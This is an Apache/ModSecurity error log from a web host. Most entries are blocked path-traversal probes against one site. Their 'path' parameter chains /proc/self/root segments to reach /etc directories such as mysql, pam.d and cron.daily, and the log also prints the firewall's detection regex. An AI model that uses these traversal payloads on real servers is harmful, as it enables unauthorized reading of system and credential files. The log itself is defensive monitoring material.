[Tue Mar 17 17:10:09.663410 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:60538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1Ida6ubjKNq_cu4YbjAAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:10:29.129766 2026] [proxy_fcgi:error] [pid 6296:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43028] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:10:39.702644 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:60542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1P-yqAr6etmhZHNo6OgAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:10:41.797494 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:60542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1QOyqAr6etmhZHNo6PAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:10:45.188148 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:50986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1Q9a6ubjKNq_cu4YbmQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:10:54.121804 2026] [proxy_fcgi:error] [pid 7437:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43966] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:10:57.384460 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:50986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1Uda6ubjKNq_cu4YbpQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:11:01.997444 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:49306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1VdY0UrI5A3LftIwQwQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:11:06.672235 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:49322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1Whj0p0SRWAqcjGGM8wAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:11:16.130070 2026] [proxy_fcgi:error] [pid 25836:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44798] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:11:21.721092 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:54766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1adY0UrI5A3LftIwQ1wAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:11:26.929061 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:51034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1bnIk7brgkOH-rIWf6wAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:11:39.139386 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:11:56.507740 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:53308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1jOyqAr6etmhZHNo6XAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:11:58.408809 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:33172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1jvPqhzTj3BvfDX-a_QAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:12:00.121801 2026] [proxy_fcgi:error] [pid 7437:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:12:16.325801 2026] [:error] [pid 29151:tid 140411607643904] [client 74.7.241.31:33176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1oPPqhzTj3BvfDX-bDwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:12:19.623147 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.241.31:41350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm1o3Ik7brgkOH-rIWf9AAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:12:29.101946 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46910] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:12:52.127774 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:13:15.069907 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48638] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:13:43.069848 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49710] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:14:05.139686 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50810] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:14:26.117784 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51716] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:14:28.362781 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.244.43:52178] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm2JHIk7brgkOH-rIWgEQAAAUY"]
[Tue Mar 17 17:14:47.133783 2026] [proxy_fcgi:error] [pid 7004:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52442] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:14:54.598129 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.228.61:52334] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm2PtY0UrI5A3LftIwRDAAAAZE"]
[Tue Mar 17 17:14:56.522502 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:60412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2QNY0UrI5A3LftIwRDwAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:14:58.309047 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.243.128:60424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2QvPqhzTj3BvfDX-bKgAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:15:00.926582 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.243.128:49148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2RHIk7brgkOH-rIWgFwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:15:04.682115 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.243.128:49162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2SBj0p0SRWAqcjGGNUgAAAw8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:15:06.694416 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:41352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2Shj0p0SRWAqcjGGNVQAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:15:09.061801 2026] [proxy_fcgi:error] [pid 6296:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53236] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:15:10.864942 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:49178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2TuyqAr6etmhZHNo6lgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
